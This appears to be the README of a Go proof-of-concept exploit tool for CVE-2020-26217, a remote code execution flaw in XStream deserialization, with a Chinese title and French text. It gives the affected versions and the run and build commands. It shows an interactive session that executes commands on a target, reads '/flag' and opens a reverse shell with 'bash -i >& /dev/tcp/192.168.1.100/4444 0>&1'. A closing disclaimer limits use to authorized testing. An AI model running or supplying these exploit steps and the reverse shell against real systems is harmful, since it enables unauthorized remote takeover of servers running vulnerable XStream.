
CVE-2020-26217 XStream反序列化的poc
Outil d'exploitation de la vulnérabilité d'exécution de code à distance dans XStream.
CVE-2020-26217 est une vulnérabilité de désérialisation dans la bibliothèque XStream. Un attaquant peut déclencher une exécution de code à distance en construisant des données XML malveillantes.
Versions concernées : XStream <= 1.4.13
go run poc.go <URL_cible>
# Lancer l'outil
go run poc.go http://target.com:8080/?data
# En mode interactif, saisir des commandes
cmd> whoami
cmd> cat /flag
cmd> bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
cmd> exit
go build -o poc poc.go
Cet outil est destiné uniquement à la recherche en sécurité et aux tests autorisés. Ne l'utilisez pas à des fins illégales. L'utilisateur assume l'entière responsabilité légale.